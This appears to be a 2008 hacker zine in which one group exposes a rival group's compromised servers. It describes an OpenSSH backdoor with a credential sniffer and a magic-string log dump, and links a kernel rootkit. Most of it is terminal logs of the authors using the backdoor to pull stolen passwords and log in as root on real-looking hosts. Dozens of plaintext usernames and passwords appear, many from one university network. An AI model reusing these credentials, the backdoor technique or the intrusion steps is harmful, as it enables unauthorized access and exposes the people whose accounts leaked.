SOMEONE OWNED IN http://labsec.elite.vc/x0x0x-exposed.txt
#!/labsec/v/for/vendetta:book1-x0x0x
######################################################################################################################
# #
# .____ ___. _________ #
# | | _____ \_ |__ / _____/ ____ ____ #
# | | \__ \ | __ \ \_____ \_/ __ \_/ ___\ #
# | |___ / __ \| \_\ \/ \ ___/\ \___ #
# |_______ (____ /___ /_______ /\___ >\___ > #
# \/ \/ \/ \/ \/ \/ #
# .___ .___ __ .__ #
# | | ____ __| _/_ __ _______/ |________|__| ____ ______ #
# | |/ \ / __ | | \/ ___/\ __\_ __ \ |/ __ \ / ___/ #
# | | | \/ /_/ | | /\___ \ | | | | \/ \ ___/ \___ \ #
# |___|___| /\____ |____//____ > |__| |__| |__|\___ >____ > #
# \/ \/ \/ \/ \/ #
# #
# #
# - presents: #
# \- x0x0x exposed -/ #
# #
######################################################################################################################
# #
# #
# chapter one : random lame stuff #
# chapter two : owned by yourself #
# chapter three : download files/sniffs/stuff #
# chapter four : conclusion #
# - x0x0x - #
# #
# #
# - [V]endetta. #
# #
#################################################################
- <l> hello everyone !
- <l> the reason of this zine(which by teh way we dont like) is: vendetta >:)
- <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x)
- <l> now it's vendetta time !
#################################################################
# #
# #
# _ _ #
# __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ #
# / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) #
# \__|_||_\__,_| .__/\__\___|_| \___/_||_\___| #
# |_| #
# #
# #
#################################################################
first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice
nick btw))
[1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
[2]; http://lasercomb.de/x0x0x2.txt
have you noticed how lame they are ?
all they can & will ever do is change your openssh version to a cracked one
and pray that the users will log into some kool server
and guess what, its NOT EVEN MADE by them ! - lets check it out -
central () labsec [~xoxox/openssh-4.7p1] # more skynet.h
/*
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### ####
- V E R S I O N 1. 0 -
coded by fmrj
11.01.2008
Features:
- Logs SSH, SCP, SFTP, SSHD and ip / hostname
- ftp logger included (netkit-ftp)
- Encrypted sniffer logs
- SSH, SCP, SFTP will not log you
- compile script (see compile.sh)
- rootlogin is permitted even though remoterootlogin is set to no
- Will not log to syslog, utmp, wtmp or lastlog
- If MAGIC_VERSION is NOT undeclared:
telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
(WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump)
Also this will NOT get logged by syslog
Future features:
- pid hiding
- More encryption / better sniffer encryption (thought of rc-crypt)
- strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log
- Have a cool PS1 for the bd
- Write a ssh client that can:
-> Connect and dump logs so you dont have to use telnet approach (encrypted)
-> That can do connect-chain (ssh -bounce box1 box2 box3)
If you have this, it either means we are friends or someone gave it to you, if so
I would like this bd to be kept as private as possible, so please dont pass it on
I would also appreciate suggestions / ideas / help / whatever for future features
aim: fmrj09
- Thanks *
*/
- then there is some shit aion code which is public @ packetstorm -
- their kool sshd backdoor kan be found in the end of thiz zine -
- dont forget to check the gr8 shellscript skotch made -
################################## leTz hIghTlIghT 50m3th1n6 #############################
telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
################################## LETS HIGHLIGHT SOMETHING #############################
ohhhhhhwwwwwwww. k00l 3n0ugh !
and gu355 wh47 ?
th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !
*thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks*
central () labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
#define MAGIC_VERSION "netdump"
----- th4nk5 8uddY ------
----- end of lame sshd backdor ----
***************** phalanx the gr8 kernel rootkit ***************
7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
whAT ELsE Do thEY USE ?
PHALANX ! THE gr8 prIv8 kERn3l r007k17
get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2
* attached their k00l phalanx in the bottom of the zine *
***************** phalanx the gr8 kernel rootkit ***************
------ funny stuff:
while looking at their boxes, we felt so disappointed that they cant even write the right sshd version..
[139.82.95.11:22] : SSH-2.0-p2-FC-4.3
[212.200.96.150:22] : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
[216.75.56.186:22] : SSH-2.0-OenSSH_4.2
[140.122.141.164:2174]: SSH-2.0-p1 Debian-5ubuntu0.5
[143.107.250.214:22] : SSH-1.99-p1
[201.62.131.185:22] : SSH-2.0-p1 Debian-8ubuntu1.2
[200.144.189.17:22] : SSH-1.99-p1
you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers?
answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check
their sshd banners.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around
~90's ? we no longer use them, k ?
they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all
their boxes,
which is the reason for the chapter two.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
#################################################################
# #
# __ __ __ #
# ____/ / ___ ____ / /____ ____ / /__ _____ #
# / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ #
# \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ #
# /_/ #
# #
# #
#################################################################
; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
;
; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE
central () labsec [~xoxox/h3h3] # telnet 189.3.219.4 22
Trying 189.3.219.4...
Connected to 189.3.219.4 (189.3.219.4).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r
th1Z:;;;;;///
SSH2_OUT: 127.0.0.1 user: root pass: R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for
ssh localhost dewd
- cut-
******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ********************
central () labsec [~xoxox/h3h3] # ssh root () 189 3 219 4
root () 189 3 219 4's password:
Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux servnet 2.6.18-4-486 i686 ****
root () servnet:~#
root () servnet:~# uname -a;/sbin/ifconfig -a|grep inet
Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux
inet addr:189.3.219.4 Bcast:189.3.219.63 Mask:255.255.255.192
root () servnet:~# last -1 root
root pts/2 189.4.161.222 Fri Aug 8 16:27 - 16:32 (00:04)
222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br.
******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ********************
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 91.199.207.141 22
Trying 91.199.207.141...
Connected to 91.199.207.141.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no
idea how kool you are
SSH2_OUT: 127.0.0.1 user: root pass: buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
pass_from: 91.199.207.142 user: root pass: salinarsalinar (x2.sprintdns.net) -->>>>>>>>>> i hope you
guys change the passwd real quick :)
central () labsec [~xoxox/h3h3] # ssh root () 91 199 207 141
root () 91 199 207 141's password:
Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux x1 2.6.18-6-686 i686 ****
root () x1:~#
root () x1:~# uname -a;w;last -1 root
Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux
08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38 (00:20)
root () x1:~# ifconfig -a|grep inet
inet addr:91.199.207.141 Bcast:91.199.207.255 Mask:255.255.255.0
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 195.91.248.58 22
Trying 195.91.248.58...
Connected to 195.91.248.58.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a
pseudo hacker
SSH2_OUT: 127.0.0.1 user: root pass: DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.
central () labsec [~xoxox/h3h3] # ssh root () 195 91 248 58
root () 195 91 248 58's password:
Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux localhost 2.6.24-gentoo-r3 i686 ****
localhost ~ #
localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R)
Core(TM)2 Duo CPU E4500 @ 2.20GHz GenuineIntel GNU/Linux
10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07 (00:06)
wtmp begins Mon Mar 31 21:49:08 2008
inet addr:195.91.248.58 Bcast:195.91.248.63 Mask:255.255.255.240
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 195.71.126.86 22
Trying 195.71.126.86...
Connected to 195.71.126.86.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.2
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
pam_from: 91.128.212.13 user: root pass: w22662s (d91-128-212-13.cust.tele2.at) ---->>>> no localhost
this time(yay!) but it works.
central () labsec [~xoxox/h3h3] # ssh root () 195 71 126 86
root () 195 71 126 86's password:
root () BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet
Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux
08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc
root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash
root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc
inet Adresse:195.71.126.86 Bcast:195.71.126.95 Maske:255.255.255.240
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 152.66.208.100 22
Trying 152.66.208.100...
Connected to 152.66.208.100.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
SSH2_OUT: 127.0.0.1 user: joeb pass: xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
pass_from: 78.131.80.171 user: joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu) > better be
changing that by now.
SSH2_OUT: 78.131.80.171 user: joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu)> better be
changing that by now.
SSH2_OUT: 84.2.126.154 user: joeb pass: valami (dsl54027E9A.pool.t-online.hu) > better be
changing that by now.
central () labsec [~xoxox/h3h3] # ssh root () 152 66 208 100
root () 152 66 208 100's password:
Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux maszat 2.6.18-6-686-bigmem i686 ****
root () maszat:~#
root () maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux
08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:152.66.208.100 Bcast:152.66.208.127 Mask:255.255.255.128
inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 147.46.242.9 22
Trying 147.46.242.9...
Connected to 147.46.242.9.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why
netdump ?
SSH2_OUT: 127.0.0.1 user: root pass: NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
pass_from: 147.46.242.52 user: dreameye pass: ii1945 (ropas.snu.ac.kr) ------>>>>>>>>>>>>>> sorry
koreans, nothing personal.
pass_from: 211.48.102.167 user: dk pass: 0ghafjs ------>>>>>>>>>>>>>> i mean,
personal with you, you no.
central () labsec [~xoxox/h3h3] # ssh root () 147 46 242 9
root () 147 46 242 9's password:
Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux abs 2.6.24-19-server i686 ****
root () abs:~#
root () abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:147.46.242.9 Bcast:147.46.242.255 Mask:255.255.255.0
inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
dreameye pts/0 ropas.snu.ac.kr Thu Aug 7 03:35 - 03:36 (00:00)
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 200.160.119.92 8022 ----- same applies for 200.160.119.93 (another
dumbox on the network)
Trying 200.160.119.92...
Connected to 200.160.119.92.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> has it
something to do with my netdump user?
pass_from: 192.168.100.231 user: root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello m0nk3y
central () labsec [~xoxox/h3h3] # ssh root () 200 160 119 92 -p 8022
root () 200 160 119 92's password:
******* no skynet thiz timE *********** h3h3h3h3 ***********
Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
root () eumisrvgw2:~#
root () eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:192.168.100.242 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
inet addr:192.168.200.254 Bcast:192.168.200.255 Mask:255.255.255.0
inet addr:200.160.119.92 Bcast:200.160.119.95 Mask:255.255.255.240
inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
inet addr:200.169.223.172 Bcast:200.169.223.175 Mask:255.255.255.248
root () eumisrvgw2:~# last -10 root|grep 189\.4
root pts/0 189.4.161.222 Mon Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder who
that kool ip iz.
----------------------->>>>> bruteforce
again? what a zhame !
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 200.20.9.67 22
Trying 200.20.9.67...
Connected to 200.20.9.67.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1 user: root pass: vEcTrrA (localhost)
central () labsec [~xoxox/h3h3] # ssh root () 200 20 9 67 -p 8022
root () 200 20 9 67's password:
root () ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet
Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux
04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00
root () ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT ------------>> this is their default
sniffer path.
SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuX0527 (didi.if.uff.int)
SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuXS0527 (didi.if.uff.int)
SSH2_OUT: 10.0.0.101 user: nuno pass: surfar (catuaba.if.uff.int)
SSH2_OUT: 10.0.0.106 user: lourenco pass: LiNuX0527 (cerbero4.if.uff.int)
SSH2_OUT: 10.0.0.108 user: critter pass: 559832 (ronaldinho.if.uff.int)
SSH2_OUT: 10.0.0.136 user: davidvaz pass: 2o3145 (barabasi.if.uff.int)
SSH2_OUT: 10.0.0.145 user: lubian pass: 15862jLr (lip-serverI.if.uff.int)
SSH2_OUT: 10.0.0.147 user: mcosta pass: 950205 (nano3.if.uff.int)
SSH2_OUT: 10.0.0.155 user: asa pass: gabixande2 (nanodc01.if.uff.int)
SSH2_OUT: 10.0.0.155 user: mcosta pass: 950205 (nanodc01.if.uff.int)
SSH2_OUT: 10.0.0.156 user: thiagofts pass: 8vacagk (Owner-PC.if.uff.int)
SSH2_OUT: 10.0.0.157 user: alanfr pass: ck37=2x (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: curso pass: curso (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: help pass: slacksucks! (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: opeador pass: slacksucks! (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157 user: operador pass: slacksucks! (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.179 user: orahcio pass: wulto12 (viagra.if.uff.int)
SSH2_OUT: 10.0.0.188 user: nuno pass: surfar (catuaba.if.uff.int)
SSH2_OUT: 10.0.0.195 user: asa pass: gabixande2 (nano2.if.uff.int)
SSH2_OUT: 10.0.0.196 user: isidoro pass: VU4R9C (zico.if.uff.int)
SSH2_OUT: 10.0.0.2 user: isidoro pass: VU4R9C
SSH2_OUT: 10.0.0.208 user: davidvaz pass: 2o3145 (homer.if.uff.int)
SSH2_OUT: 10.0.0.208 user: davidvaz pass: o3145 (homer.if.uff.int)
SSH2_OUT: 10.0.0.208 user: tgmattos pass: CAMtgm&7 (homer.if.uff.int)
SSH2_OUT: 10.0.0.215 user: asa pass: gabixande2 (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX0527 (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX05427 (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.217 user: dionizio pass: Zoedoulos (cerbero9.if.uff.int)
SSH2_OUT: 10.0.0.217 user: lourenco pass: LiNuX0527 (cerbero9.if.uff.int)
SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX0527 (romario.if.uff.int)
SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX527 (romario.if.uff.int)
SSH2_OUT: 10.0.0.226 user: dionizio pass: Zoedoulos (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.226 user: lourenco pass: LiNuX0527 (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.226 user: lourenco pass: exit (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.227 user: jssm pass: Jujaja (complex000.if.uff.int)
SSH2_OUT: 10.0.0.227 user: nuno pass: surfar (complex000.if.uff.int)
SSH2_OUT: 10.0.0.227 user: pmco pass: druida99 (complex000.if.uff.int)
SSH2_OUT: 10.0.0.231 user: alan pass: ck37=2x
SSH2_OUT: 10.0.0.231 user: root pass: slacksucks!
SSH2_OUT: 10.0.0.231 user: root pass: slacksucks! (urania.if.uff.int)
SSH2_OUT: 10.0.0.246 user: bernardo pass: (damasco.if.uff.int)
SSH2_OUT: 10.0.0.246 user: bernardo pass: truthno1 (damasco.if.uff.int)
SSH2_OUT: 10.0.0.247 user: jssm pass: Jujaja (gould.if.uff.int)
SSH2_OUT: 10.0.0.44 user: tgmattos pass: CAMtgm&7
SSH2_OUT: 10.0.0.60 user: fsilveira pass: Instituto
SSH2_OUT: 10.0.0.60 user: fsilveira pass: VaiPasSar
SSH2_OUT: 10.0.0.75 user: davidvaz pass: 2o3145 (DOAS-Laptop.if.uff.int)
SSH2_OUT: 10.0.0.78 user: alan pass: ck37=2x (urania.if.uff.int)
SSH2_OUT: 10.0.0.93 user: pmco pass: druida99 (urubu.if.uff.int)
SSH2_OUT: 10.0.0.93 user: pmco pass: druidruida99 (urubu.if.uff.int)
SSH2_OUT: 10.0.0.97 user: critter pass: 559832 (ronaldinho.if.uff.int)
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 203.161.120.230 22
Trying 203.161.120.230...
Connected to 203.161.120.230.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
pass_from: 58.7.216.153 user: root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry
pal.
central () labsec [~xoxox/h3h3] # ssh root () 203 161 120 230
root () 203 161 120 230's password:
----- no skynet -------
Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au
zeus:~#
zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:203.161.120.230 Bcast:203.161.120.255 Mask:255.255.255.240
inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
inet addr:11.11.11.3 Bcast:11.255.255.255 Mask:255.255.255.0
zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more
SSH2_OUT: 11.11.11.55 user: michael pass: @pixar87
SSH2_OUT: 11.11.11.55 user: michael pass: dh0st1ngd
SSH2_OUT: 11.11.11.55 user: michael pass: ruup2it
SSH2_OUT: 11.11.11.55 user: root pass: @pixar87
SSH2_OUT: 11.11.11.9 user: admin pass: @pixar87
SSH2_OUT: 11.11.11.9 user: admin pass: emaildivers
SSH2_OUT: 11.11.11.9 user: admin pass: jugg3r0
SSH2_OUT: 11.11.11.9 user: root pass: @pixar887
SSH2_OUT: 11.11.11.9 user: root pass: jugg3r0
pass_from: 10.10.10.129 user: root pass: @pixar87
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 207.145.66.12 22
Trying 207.145.66.12...
Connected to 207.145.66.12.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
pass_from: 24.218.192.76 user: root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro
pass_from: 75.68.31.152 user: gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net) -> >:(
central () labsec [~xoxox/h3h3] # ssh root () 207 145 66 12
root () 207 145 66 12's password:
Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201 --------->>>>>>>>>>>>>>>>>>>>>>>>> quick
question, who's that ?
--------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that
make you sad? i mean, wtf...
d4:~#
d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux
03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:207.145.66.12 Bcast:207.145.66.255 Mask:255.255.255.0
inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 212.111.196.163 22
Trying 212.111.196.163...
Connected to 212.111.196.163.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE
PASSWORD !
SSH2_OUT: 127.0.0.1 user: root pass: x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed
you, localhost.
pass_from: ::ffff:10.66.10.111 user: root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(
central () labsec [~xoxox/h3h3] # ssh root () 212 111 196 163
root () 212 111 196 163's password:
Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222 ------------>>>>>>>>>>>>>> lets laugh for a
while now
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
